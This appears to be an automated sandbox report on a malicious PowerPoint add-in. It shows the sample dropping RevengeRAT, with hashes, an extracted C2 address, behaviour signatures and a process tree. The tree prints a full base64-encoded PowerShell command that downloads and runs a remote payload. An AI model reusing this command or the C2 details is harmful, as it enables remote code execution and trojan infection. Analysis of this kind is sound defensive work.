Analysis

  • max time kernel
    149s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240319-en
  • resource tags

    arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system
  • submitted
    17-04-2024 01:00

General

  • Target

    013fefe1917cdeedc66a5e4bee5417894491591296a91a507224ae5af9618cda.ppam

  • Size

    28KB

  • MD5

    7e0c3f4ee3bb201339b0be1e73142374

  • SHA1

    bb1dbdfd0cbbdb0f33dba0502d896224ba567680

  • SHA256

    013fefe1917cdeedc66a5e4bee5417894491591296a91a507224ae5af9618cda

  • SHA512

    5398377cd90f8aa3b8834eef60fcf438c9eeed154e78447b902e04b1f5071726aa03c2bcca5280da1c8e06649b9a01f7645638ae6cd09f8a68f69fe41f299da4

  • SSDEEP

    768:VPKiNgILNl1pb2GdSXlWEsusK+oCx7oho6n7vtxUkO:VC6vgIS4tokyH7lmkO

Malware Config

Extracted

Family

revengerat

Botnet

NyanCatRevenge

C2

craxsrat.ddns.com.br:333

Mutex

27d7e6701f5e

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

  • Blocklisted process makes network request 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\013fefe1917cdeedc66a5e4bee5417894491591296a91a507224ae5af9618cda.ppam"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1932
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2232
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAuAEkAbgB2AG8AawBlACgAJwANAAoAaAB0AHQAcABzADoALwAvAGYAaQByAGUAYgBhAHMAZQBzAHQAbwByAGEAZwBlAC4AZwBvAG8AZwBsAGUAYQBwAGkAcwAuAGMAbwBtAC8AdgAwAC8AYgAvAHQAZQBzAHQAaQBuAGcALQBlAGEAZgAyADgALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AUgBFAFYARQBOAEcARQBSAC4AagBwAGcAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9AGIAOAA1AGIANABiADMANAAtADQAZgBiADkALQA0ADgANAAwAC0AYQAxAGQANwAtADMAMgA3AGEAZABlAGIAZQAwAGMANAA0AA0ACgAnACkAOwAgAA0ACgBHAHoATQBJAFQAWgBQAFIAVwBhAFQATQBvAEMAVwBiAGEAUwBNAFcAQgBkAEgASwBhAG8AcgBJAGMAdwBkAFkAbwBpAHoAeQBWAFIAdgBSAEkAUgBNAGYASABLAHoAawBYAEMAcwBwAFcAUwBIAGMAcwBjAEgARwBrAGgAUQBtAFcAVQB6AEsASABEAGgAawBHAHkAbwBMAHMAQwBkAHMAVABpAE0ADQAKAA==""
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2696
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
            PID:2476

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1932-41-0x0000000071D0D000-0x0000000071D18000-memory.dmp
        Filesize

        44KB

      • memory/1932-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/1932-2-0x0000000071D0D000-0x0000000071D18000-memory.dmp
        Filesize

        44KB

      • memory/1932-8-0x0000000000510000-0x0000000000610000-memory.dmp
        Filesize

        1024KB

      • memory/1932-9-0x0000000000510000-0x0000000000610000-memory.dmp
        Filesize

        1024KB

      • memory/1932-13-0x0000000000510000-0x0000000000610000-memory.dmp
        Filesize

        1024KB

      • memory/1932-12-0x0000000000510000-0x0000000000610000-memory.dmp
        Filesize

        1024KB

      • memory/1932-15-0x0000000000510000-0x0000000000610000-memory.dmp
        Filesize

        1024KB

      • memory/1932-16-0x0000000000510000-0x0000000000610000-memory.dmp
        Filesize

        1024KB

      • memory/1932-19-0x0000000000510000-0x0000000000610000-memory.dmp
        Filesize

        1024KB

      • memory/1932-20-0x0000000000510000-0x0000000000610000-memory.dmp
        Filesize

        1024KB

      • memory/1932-18-0x0000000000510000-0x0000000000610000-memory.dmp
        Filesize

        1024KB

      • memory/1932-71-0x0000000071D0D000-0x0000000071D18000-memory.dmp
        Filesize

        44KB

      • memory/1932-70-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/1932-67-0x0000000000510000-0x0000000000610000-memory.dmp
        Filesize

        1024KB

      • memory/1932-66-0x0000000005490000-0x0000000005590000-memory.dmp
        Filesize

        1024KB

      • memory/1932-63-0x0000000000510000-0x0000000000610000-memory.dmp
        Filesize

        1024KB

      • memory/1932-0-0x000000002D151000-0x000000002D152000-memory.dmp
        Filesize

        4KB

      • memory/2476-51-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
        Filesize

        4KB

      • memory/2476-54-0x0000000000090000-0x000000000009A000-memory.dmp
        Filesize

        40KB

      • memory/2476-73-0x00000000023E0000-0x0000000002420000-memory.dmp
        Filesize

        256KB

      • memory/2476-72-0x00000000668B0000-0x0000000066F9E000-memory.dmp
        Filesize

        6.9MB

      • memory/2476-68-0x00000000023E0000-0x0000000002420000-memory.dmp
        Filesize

        256KB

      • memory/2476-65-0x00000000668B0000-0x0000000066F9E000-memory.dmp
        Filesize

        6.9MB

      • memory/2476-62-0x0000000000090000-0x000000000009A000-memory.dmp
        Filesize

        40KB

      • memory/2476-59-0x0000000000090000-0x000000000009A000-memory.dmp
        Filesize

        40KB

      • memory/2476-55-0x0000000000090000-0x000000000009A000-memory.dmp
        Filesize

        40KB

      • memory/2476-45-0x0000000000090000-0x000000000009A000-memory.dmp
        Filesize

        40KB

      • memory/2476-43-0x0000000000090000-0x000000000009A000-memory.dmp
        Filesize

        40KB

      • memory/2476-47-0x0000000000090000-0x000000000009A000-memory.dmp
        Filesize

        40KB

      • memory/2476-49-0x0000000000090000-0x000000000009A000-memory.dmp
        Filesize

        40KB

      • memory/2696-42-0x0000000002560000-0x0000000002561000-memory.dmp
        Filesize

        4KB

      • memory/2696-30-0x0000000002520000-0x0000000002538000-memory.dmp
        Filesize

        96KB

      • memory/2696-28-0x00000000050A0000-0x00000000050FB000-memory.dmp
        Filesize

        364KB

      • memory/2696-38-0x0000000002520000-0x0000000002538000-memory.dmp
        Filesize

        96KB

      • memory/2696-29-0x0000000002520000-0x0000000002538000-memory.dmp
        Filesize

        96KB

      • memory/2696-27-0x0000000002330000-0x0000000002370000-memory.dmp
        Filesize

        256KB

      • memory/2696-64-0x000000006ADF0000-0x000000006B39B000-memory.dmp
        Filesize

        5.7MB

      • memory/2696-40-0x0000000002520000-0x0000000002538000-memory.dmp
        Filesize

        96KB

      • memory/2696-26-0x0000000002330000-0x0000000002370000-memory.dmp
        Filesize

        256KB

      • memory/2696-25-0x0000000002330000-0x0000000002370000-memory.dmp
        Filesize

        256KB

      • memory/2696-32-0x0000000002520000-0x0000000002538000-memory.dmp
        Filesize

        96KB

      • memory/2696-24-0x000000006ADF0000-0x000000006B39B000-memory.dmp
        Filesize

        5.7MB

      • memory/2696-23-0x000000006ADF0000-0x000000006B39B000-memory.dmp
        Filesize

        5.7MB

      • memory/2696-34-0x0000000002520000-0x0000000002538000-memory.dmp
        Filesize

        96KB

      • memory/2696-36-0x0000000002520000-0x0000000002538000-memory.dmp
        Filesize

        96KB